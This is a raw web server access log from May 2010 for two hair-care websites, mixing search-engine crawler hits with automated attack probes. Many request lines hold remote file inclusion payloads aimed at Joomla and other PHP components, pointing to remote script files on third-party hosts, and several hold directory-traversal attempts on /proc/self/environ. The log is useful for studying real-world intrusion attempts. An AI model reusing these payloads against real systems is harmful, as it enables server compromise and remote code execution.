77.221.137.18 - - [17/May/2010:14:44:40 -0700] "GET /logs/access_100215.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:45:19 -0700] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:45:19 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:45:20 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:46:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=20450 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:48:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5129 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:50:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6472 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:52:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2179 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:53:45 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:53:45 -0700] "GET /logs/access_100301.log%20%20/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:53:51 -0700] "GET /logs/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:53:51 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:53:51 -0700] "GET /logs/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:53:51 -0700] "GET /logs/access_100301.log%20%20/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:54:57 -0700] "GET /logs/access_100412.log%20%20/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [17/May/2010:14:55:07 -0700] "GET /logs/access_100412.log%20%20/skin/board/moviefl/download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:55:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2427 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:57:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6592 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:14:57:38 -0700] "GET /logs/scripts.log HTTP/1.1" 200 13297 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
213.253.92.100 - - [17/May/2010:14:58:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Najdi.si/3.1)" "freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:59:29 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:59:52 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7368 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:01:20 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:15:02:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5570 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
67.222.30.85 - - [17/May/2010:15:03:18 -0700] "GET /include/write.php?dir=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:15:03:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12881 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:15:04:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6391 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:15:06:08 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:15:06:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6441 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:15:09:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6522 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:11:05 -0700] "GET /logs/access_100322.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:11:05 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:11:06 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:15:11:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6719 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:12:47 -0700] "GET /logs/access_100405.log//include/write.php?dir=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:12:47 -0700] "GET /include/write.php?dir=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:12:47 -0700] "GET /logs//include/write.php?dir=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:13:11 -0700] "GET /logs/access_091026.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:13:12 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:13:12 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:15:13:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=921 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
124.115.6.16 - - [17/May/2010:15:14:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
67.222.30.85 - - [17/May/2010:15:14:51 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.freehairsecrets.com"
67.222.30.85 - - [17/May/2010:15:14:51 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.freehairsecrets.com"
67.222.30.85 - - [17/May/2010:15:15:51 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:17:19 -0700] "GET /logs/access_100510.log//components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:17:19 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:17:20 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
88.250.57.232 - - [17/May/2010:15:17:52 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "-" "Wget/1.11.4" "www.freehairsecrets.com"
211.5.245.2 - - [17/May/2010:15:18:02 -0700] "GET /logs/access_100215.log%20%20//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.5.245.2 - - [17/May/2010:15:18:02 -0700] "GET /?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
211.5.245.2 - - [17/May/2010:15:18:02 -0700] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5376 "-" "Mozilla/5.0" "growlonghairfast.com"
88.250.57.232 - - [17/May/2010:15:19:34 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "-" "Wget/1.11.4" "growlonghairfast.com"
211.5.245.2 - - [17/May/2010:15:19:58 -0700] "GET /?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
211.5.245.2 - - [17/May/2010:15:20:03 -0700] "GET /logs/access_100215.log//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.5.245.2 - - [17/May/2010:15:20:03 -0700] "GET /logs//?root=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 5376 "-" "Mozilla/5.0" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:15:20:46 -0700] "GET /errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
111.89.128.186 - - [17/May/2010:15:20:46 -0700] "GET /logs//errors.php?error=http://gtrf.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.203.68.45 - - [17/May/2010:15:21:51 -0700] "GET /bbs/good.php?board_skin_path=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:27:38 -0700] "GET /logs/access_091026.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:27:39 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:15:27:39 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
208.80.193.32 - - [17/May/2010:15:29:37 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iOpus-I-M; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:15:33:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14137 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.221.130.2 - - [17/May/2010:15:39:00 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:15:39:00 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:15:39:00 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:15:40:59 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lubuskifotograf.pl/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:15:40:59 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lubuskifotograf.pl/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:15:40:59 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lubuskifotograf.pl/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:15:41:13 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lubuskifotograf.pl/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:15:41:13 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lubuskifotograf.pl/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:15:41:13 -0700] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lubuskifotograf.pl/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:15:43:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13476 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
67.222.30.85 - - [17/May/2010:15:44:24 -0700] "GET /logs/access_100405.log//components/com_flyspray/startdown.php?file=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "growlonghairfast.com"
74.118.193.84 - - [17/May/2010:15:47:02 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "growlonghairfast.com"
74.118.193.84 - - [17/May/2010:15:47:03 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "growlonghairfast.com"
220.181.7.113 - - [17/May/2010:15:47:10 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12500 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.221.130.2 - - [17/May/2010:15:47:32 -0700] "GET /logs/access_100315.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.108.67.101 - - [17/May/2010:15:48:58 -0700] "GET /logs/access_100125.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.67.101 - - [17/May/2010:15:48:58 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
89.108.67.101 - - [17/May/2010:15:48:58 -0700] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "growlonghairfast.com"
124.115.6.16 - - [17/May/2010:15:56:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
208.80.193.37 - - [17/May/2010:16:00:07 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Creative; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)" "freehairsecrets.com"
75.125.250.26 - - [17/May/2010:16:04:30 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:16:04:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13741 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
75.125.250.26 - - [17/May/2010:16:08:06 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.221.130.2 - - [17/May/2010:16:09:10 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:09:10 -0700] "GET /logs/access_100405.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:09:10 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.111.220 - - [17/May/2010:16:09:54 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.111.220 - - [17/May/2010:16:09:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15103 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
193.105.210.182 - - [17/May/2010:16:10:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
193.105.210.182 - - [17/May/2010:16:10:25 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Opera/9.0 (Windows NT 5.1; U; en)" "growlonghairfast.com"
69.163.162.245 - - [17/May/2010:16:12:07 -0700] "GET /logs/access_100503.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.163.162.245 - - [17/May/2010:16:12:07 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
69.163.162.245 - - [17/May/2010:16:12:07 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.125.250.26 - - [17/May/2010:16:13:43 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.125.250.26 - - [17/May/2010:16:13:43 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
75.125.250.26 - - [17/May/2010:16:13:43 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.221.130.2 - - [17/May/2010:16:25:35 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:25:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:25:35 -0700] "GET /logs/access_100315.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:25:39 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:25:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [17/May/2010:16:25:39 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://eurosports-voyages.com/lang/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
